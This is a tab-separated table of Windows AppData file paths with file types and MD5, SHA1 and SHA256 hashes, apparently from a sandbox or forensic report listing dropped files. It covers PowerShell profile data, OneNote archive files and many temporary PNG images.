C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\OneNote Archive\Getting Started.one	data	702E2595DBBC8C1402B955224BD1D721	185BB86F1F2113009AA1EBE4912BED789624AF12	2C98ABD886BFDF2BBA24DD6B1D72D74D8A0D988F18F5297DFA72809E26E2B233
C:\Users\user\AppData\Local\Temp\OneNote Archive\Open Notebook.onetoc2	data	02C920C0AB0B305CBA7C59C6AD4193C5	8F5D82360387B5B9F4A519E1CE5F12F9EA310813	8D14958D1BB46BCF31DEFA6DD2A3A6AAE7B34628213435DCF08C528B46F171C0
C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl	data	CDDBC14CDCD9D96F9A49378EE6FED787	E83D1D2AAEF53133DF6A43E3B1E14AD30AF3BD20	624BF6D49B6E7E87EB4289078B7144D668A37A5C4639AF8B725CBE0820146C58
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54qw5cdw.to2.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gf3ru34.23y.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhdcypmx.keq.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnqo3hxp.opj.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\{01DF93F7-D7C8-49E7-ACF5-42B9506E720C}	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{03EF2E50-AC66-4BEA-B2D2-3F37B5438107}	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced	C2BF462C1311A92660999498F29394BD	4BD7C156F172C1114F33D80BAB05252C9F8E87C0	5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
C:\Users\user\AppData\Local\Temp\{053808ED-A823-43D4-B7CE-AD53FBCCEA07}	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced	EDB5ED43CC6038500A54B90BEC493628	A8CD63F3914E4347F4C5552FB922C6C03917F45F	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
C:\Users\user\AppData\Local\Temp\{05A11B15-896E-4291-A74E-B32FD8C5FCB8}.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{05C26474-B79F-440C-AF51-8AF8DFB93FEB}	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	995CEACAD563F849C4142B6A6F29F081	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
C:\Users\user\AppData\Local\Temp\{1393251E-863A-422A-AFE0-46368B47935D}	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced	734BA03175EBC8B8E3EF57BC3DDC9D8E	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
C:\Users\user\AppData\Local\Temp\{1446C4F2-FA63-4782-87AC-6D2620EBBF7C}.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{14E5622A-6AFA-4099-A7F6-553D29AAF903}	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced	B1FDE66F75507567B5F0C6C07B01A3A1	80B8E6A923E853232F66C874367E90B5C9CAD7AE	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
C:\Users\user\AppData\Local\Temp\{150E099A-9CB1-46FE-929D-FBA8FAEEBB43}.bin	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced	548D234C9AB4021CA5FAB7BF22502465	2F7495D250DC86EA99473CC342D164B859926021	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
C:\Users\user\AppData\Local\Temp\{16C683EC-AFC0-46C0-A881-2CE20AB3EC36}	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced	D5F7A65469623327F799B516ACBFFD2F	76C6333C14AF3A7EA091819953E6E12DC289A12C	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
C:\Users\user\AppData\Local\Temp\{16F2CCD3-7155-4342-AAAB-D953EC136172}.bin	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced	0693DABBBC411538D209F32E22F622F6	FB7E675406FA123CDB7E058D336742D6A2E8DC8E	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
C:\Users\user\AppData\Local\Temp\{1718266F-658B-40B4-8876-19AC9018A8CF}.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	31579CA3352DF8FA4E3E7F48C7CDF672	AA682A3C781BF8EE43B5EDC9718E64CB79135F25	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
C:\Users\user\AppData\Local\Temp\{183C2899-6A9F-4D0A-BC4D-3C1956484210}.bin	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced	70DAF02EC717AB54452FA4C707BCAC74	30F46FAC5E96470848C5A948162CC12455A05154	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
C:\Users\user\AppData\Local\Temp\{18586D77-A491-41E1-9B55-484FAC587C99}	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced	D5F7A65469623327F799B516ACBFFD2F	76C6333C14AF3A7EA091819953E6E12DC289A12C	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
C:\Users\user\AppData\Local\Temp\{18710D6B-F1E6-4CEC-B2E3-88F6F8F6ADEC}	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced	0693DABBBC411538D209F32E22F622F6	FB7E675406FA123CDB7E058D336742D6A2E8DC8E	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
C:\Users\user\AppData\Local\Temp\{1C54229F-B4AC-4B4F-A5C4-B6C0870196B9}	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	C451B2A146BDD7EF33AB3EA27268796D	C040BA2F31342CBCBF597C96D4D6EDB83D473B77	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
C:\Users\user\AppData\Local\Temp\{20691C45-3912-4E04-9F9D-7D785AADBB33}	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced	0693DABBBC411538D209F32E22F622F6	FB7E675406FA123CDB7E058D336742D6A2E8DC8E	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
C:\Users\user\AppData\Local\Temp\{22C00A46-DB88-4EF8-9B6E-FA6F60F7F1EF}.bin	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced	A1A1017A6A7928761CEB56D1D950E123	28272E9C7F816A1CE8F2033FC00F489005332365	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
C:\Users\user\AppData\Local\Temp\{235F4D30-C8DD-49E5-ACF3-C6D78A5C54D8}.bin	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced	548D234C9AB4021CA5FAB7BF22502465	2F7495D250DC86EA99473CC342D164B859926021	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
C:\Users\user\AppData\Local\Temp\{23D3D0F8-5DF7-4934-B460-BAA6B954BE34}.bin	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced	5B386BF9A20766956A84F67F913F23D7	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
C:\Users\user\AppData\Local\Temp\{24383C51-047F-41BD-A1B0-F3217D15FC44}.bin	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced	E88131C9AAC52649FF044905ACAB9B76	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
C:\Users\user\AppData\Local\Temp\{2741F630-66F3-4FC2-A595-4AAEF2545FD7}.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	163E6791C87E4999C343EC5E23843B15	43CE3BAE19E22876483A7FD0E93DB45790373600	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
C:\Users\user\AppData\Local\Temp\{27D3169C-2C40-403C-9C05-53FD1A6D7C54}.bin	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced	17E9FF9F735102231846936F0E2BAF1A	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
C:\Users\user\AppData\Local\Temp\{2870A86B-64C3-4442-809B-DCA34ACE9854}	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced	5B386BF9A20766956A84F67F913F23D7	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
C:\Users\user\AppData\Local\Temp\{2949D679-7E97-4142-90C8-19A1367FE15E}.bin	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced	70DAF02EC717AB54452FA4C707BCAC74	30F46FAC5E96470848C5A948162CC12455A05154	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
C:\Users\user\AppData\Local\Temp\{29D0BF62-CFEF-4BA3-87B4-DA58BF4FF1E5}.bin	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced	91CB7F1273AA003076401081B8A22237	5157144069E7D2FDAE60B397BE5851E75BDF7707	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
C:\Users\user\AppData\Local\Temp\{2B55F746-CF70-4BC6-8D87-4EB1BAF41179}.bin	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced	29B87BEEC5D3899824AA390530CD47FB	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
C:\Users\user\AppData\Local\Temp\{2BE2AE42-E830-4B6B-94A2-CFF047372A86}	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	708E8EB906BC105CCA0535AE669AA651	38D82DEDFE97D3001188C2E18FE13BD741FD520F	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
C:\Users\user\AppData\Local\Temp\{2CA96999-535B-4CAB-83DB-494328159237}.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	3E9F7D399DF9CAD3669B7A5445EF7074	2FBC965DC03EF9203581F595E0D7AB1734726ED7	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
C:\Users\user\AppData\Local\Temp\{2CBEF025-7A03-47E9-860E-47A4CC399F77}	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced	17E9FF9F735102231846936F0E2BAF1A	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
C:\Users\user\AppData\Local\Temp\{2D111B9E-F79A-4647-B3FB-EAC9183F09A3}.bin	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced	7CEB71F78A193F8C9F7FFDA5F81AEBD8	EEC1597705EFF1A527C246B86A71878185BA6B1B	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
C:\Users\user\AppData\Local\Temp\{2DC2D18A-2AE4-4E6E-9892-1808B65C78F3}.bin	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced	EDB5ED43CC6038500A54B90BEC493628	A8CD63F3914E4347F4C5552FB922C6C03917F45F	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
C:\Users\user\AppData\Local\Temp\{2E5666FF-E386-4C9B-8F06-84D165C87F76}	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced	548D234C9AB4021CA5FAB7BF22502465	2F7495D250DC86EA99473CC342D164B859926021	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
C:\Users\user\AppData\Local\Temp\{2E6A69E8-64A0-4702-9194-3F1E59ADC584}	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{2EBB9041-6E91-42DE-90CF-889C70CC8950}.bin	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	995CEACAD563F849C4142B6A6F29F081	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
C:\Users\user\AppData\Local\Temp\{3637C9C3-640D-4AC7-A7C8-926DF710FC58}	GIF image data, version 89a, 1012 x 327	B035F23C68CC9673E604FE5472F223D2	56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1	F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
C:\Users\user\AppData\Local\Temp\{3E1590AC-8C97-4DAB-8BCF-0C4E8711749C}.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{3E1E0AA9-3948-4D1D-AADD-BA4FFA111CCF}.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{3E5E16D0-D9AF-4DB3-9BDC-D909D4138C11}.bin	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced	BC6C08F8C2C6D1EEE95ABFC40C3C3669	44DE7375375880ACC24938D7E92A837E85C35321	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
C:\Users\user\AppData\Local\Temp\{3F5131D0-2964-4B33-9F49-08BF23A57A81}.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	708E8EB906BC105CCA0535AE669AA651	38D82DEDFE97D3001188C2E18FE13BD741FD520F	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
C:\Users\user\AppData\Local\Temp\{3F5DB1C9-193B-46A8-ADE9-665B90899D2D}	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	3E9F7D399DF9CAD3669B7A5445EF7074	2FBC965DC03EF9203581F595E0D7AB1734726ED7	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
C:\Users\user\AppData\Local\Temp\{4170D8C0-B872-4CCF-A71B-A1E30E7A125D}.bin	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced	B1FDE66F75507567B5F0C6C07B01A3A1	80B8E6A923E853232F66C874367E90B5C9CAD7AE	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
C:\Users\user\AppData\Local\Temp\{451A3E96-B4B9-4608-80E7-17D276D6A423}	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	3E9F7D399DF9CAD3669B7A5445EF7074	2FBC965DC03EF9203581F595E0D7AB1734726ED7	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
C:\Users\user\AppData\Local\Temp\{45442089-EEE3-4B55-9CA2-F0BE31F7A074}.bin	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced	D5F7A65469623327F799B516ACBFFD2F	76C6333C14AF3A7EA091819953E6E12DC289A12C	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
C:\Users\user\AppData\Local\Temp\{45A4ECBE-D65A-49F1-AAC5-8C26993226D8}	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{462D736E-D37E-47A1-9656-C7A3222DF69D}.bin	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{469906D9-9BBB-4454-8D26-DEF16D12D9E2}.bin	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced	DB48555480A383CD1D4DD00E2BCFCF29	8060B6FE12175289F0A71F45B894030A0D9F1AB5	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
C:\Users\user\AppData\Local\Temp\{47DABD16-94DA-4D43-813B-10B0ADFDA7D2}	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced	7F161B19B937AB48D4FD2F6E5E16FDBD	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
C:\Users\user\AppData\Local\Temp\{4821CED6-C57A-44EB-8A86-4CB5DB0FD8D2}	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced	01367FEEE0A83E8765E971E0D3740900	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
C:\Users\user\AppData\Local\Temp\{4888551E-F554-438E-959C-17D0886467D2}	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	708E8EB906BC105CCA0535AE669AA651	38D82DEDFE97D3001188C2E18FE13BD741FD520F	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
C:\Users\user\AppData\Local\Temp\{4D46DD88-9301-4883-91D8-CF46A6632E36}	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced	73E38124F94AD20A2F1571FBBE11AEEC	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
C:\Users\user\AppData\Local\Temp\{4E869C6D-6CA5-4EB9-87AF-AE2DA89ED907}.bin	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced	01367FEEE0A83E8765E971E0D3740900	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
C:\Users\user\AppData\Local\Temp\{4F8EBC52-7DDC-44B6-A286-F30F71FF3FD3}.bin	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced	817D5A35EDB2B0E052194D4F49FDA19C	FA6CB2016C5F43B76102B63D60359139227E07EA	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
C:\Users\user\AppData\Local\Temp\{52BD32A9-8165-4689-A8E4-716B9AF418B0}.bin	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced	6EFE6733E10E011FFDD6711B5F37C9E2	C72549E824EAD899944A38C46FBC28BDCDAAD611	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
C:\Users\user\AppData\Local\Temp\{5371EF46-8412-45EF-B7EC-31E13AA9BC6E}	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	875CFB3B5C3619253223731E8C9879E5	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
C:\Users\user\AppData\Local\Temp\{55104584-63BB-482C-86C3-C28AE73F1B11}	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced	DB48555480A383CD1D4DD00E2BCFCF29	8060B6FE12175289F0A71F45B894030A0D9F1AB5	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
C:\Users\user\AppData\Local\Temp\{5589BEE2-ECE2-4A2D-8AC4-085C2EF35152}.bin	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	C451B2A146BDD7EF33AB3EA27268796D	C040BA2F31342CBCBF597C96D4D6EDB83D473B77	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
C:\Users\user\AppData\Local\Temp\{571B89A0-FF88-4410-8386-831D58453715}.bin	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	995CEACAD563F849C4142B6A6F29F081	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
C:\Users\user\AppData\Local\Temp\{57501545-60CA-4E8F-9031-C81FD814DB9D}	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced	29B87BEEC5D3899824AA390530CD47FB	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
C:\Users\user\AppData\Local\Temp\{576861ED-7505-4CA6-BCD6-90BB2045D354}.bin	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced	7F161B19B937AB48D4FD2F6E5E16FDBD	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
C:\Users\user\AppData\Local\Temp\{579900EB-EC14-498B-87BE-57A18E6191BB}.bin	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	C451B2A146BDD7EF33AB3EA27268796D	C040BA2F31342CBCBF597C96D4D6EDB83D473B77	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
C:\Users\user\AppData\Local\Temp\{588FA160-4304-4A41-BAB3-424583F3F3BC}.bin	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced	91CB7F1273AA003076401081B8A22237	5157144069E7D2FDAE60B397BE5851E75BDF7707	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
C:\Users\user\AppData\Local\Temp\{59128DE0-12F9-45BA-9695-5A0845EBE1CD}.bin	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced	01367FEEE0A83E8765E971E0D3740900	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
C:\Users\user\AppData\Local\Temp\{592BA7D2-11DF-499C-B321-93335149D3F4}.bin	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced	AE32E846559D576FD263BD69FEDBEC28	D481DF71C858BAECFE33418002D368F2DCF68D4A	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
C:\Users\user\AppData\Local\Temp\{5C66C960-C533-4858-B269-049115105359}	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced	BC6C08F8C2C6D1EEE95ABFC40C3C3669	44DE7375375880ACC24938D7E92A837E85C35321	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
C:\Users\user\AppData\Local\Temp\{5D058A82-29B4-46DD-903B-59E5CC7089AB}	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	163E6791C87E4999C343EC5E23843B15	43CE3BAE19E22876483A7FD0E93DB45790373600	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
C:\Users\user\AppData\Local\Temp\{5E5FC786-060F-4AE1-B290-184184093952}.bin	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced	AE32E846559D576FD263BD69FEDBEC28	D481DF71C858BAECFE33418002D368F2DCF68D4A	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
C:\Users\user\AppData\Local\Temp\{609777D3-B74F-4990-89DE-F84B440DC8F2}	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	163E6791C87E4999C343EC5E23843B15	43CE3BAE19E22876483A7FD0E93DB45790373600	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
C:\Users\user\AppData\Local\Temp\{62BE44C8-C234-4F4D-AB94-D581F1FC9DB2}.bin	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced	7CEB71F78A193F8C9F7FFDA5F81AEBD8	EEC1597705EFF1A527C246B86A71878185BA6B1B	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
C:\Users\user\AppData\Local\Temp\{62E48AF2-A111-4F81-90A5-2E7F22FC0E19}.bin	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced	EDB5ED43CC6038500A54B90BEC493628	A8CD63F3914E4347F4C5552FB922C6C03917F45F	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
C:\Users\user\AppData\Local\Temp\{63C4FC4A-57CF-466A-8908-8FB627C644A2}.bin	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced	DB48555480A383CD1D4DD00E2BCFCF29	8060B6FE12175289F0A71F45B894030A0D9F1AB5	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
C:\Users\user\AppData\Local\Temp\{64444716-09CF-4B8E-9056-C3866ABC232D}.bin	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced	8B3AEC1986A522951942BA72B85CCAA0	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
C:\Users\user\AppData\Local\Temp\{65924EE9-BD13-4DDE-A74A-101DA5B21B97}.bin	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced	EDB5ED43CC6038500A54B90BEC493628	A8CD63F3914E4347F4C5552FB922C6C03917F45F	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
C:\Users\user\AppData\Local\Temp\{65DEF586-789B-463D-B21C-382D57F5C674}	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced	3F1535054D4F9626F0EB10CEE47F076E	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
C:\Users\user\AppData\Local\Temp\{6642D17A-3B38-4103-97C0-7263984300B4}	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	875CFB3B5C3619253223731E8C9879E5	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
C:\Users\user\AppData\Local\Temp\{6808A2FB-C994-4284-9857-28460758B905}	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced	995CEACAD563F849C4142B6A6F29F081	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
C:\Users\user\AppData\Local\Temp\{6A41B7F8-C72A-4BA0-B7CB-F01FD40058B3}.bin	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced	17E9FF9F735102231846936F0E2BAF1A	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
C:\Users\user\AppData\Local\Temp\{6AA7C499-8B9B-4199-BBE0-E5464D936F3E}.bin	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced	3A5CD52E925A7C4A345047D8F06C3C41	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
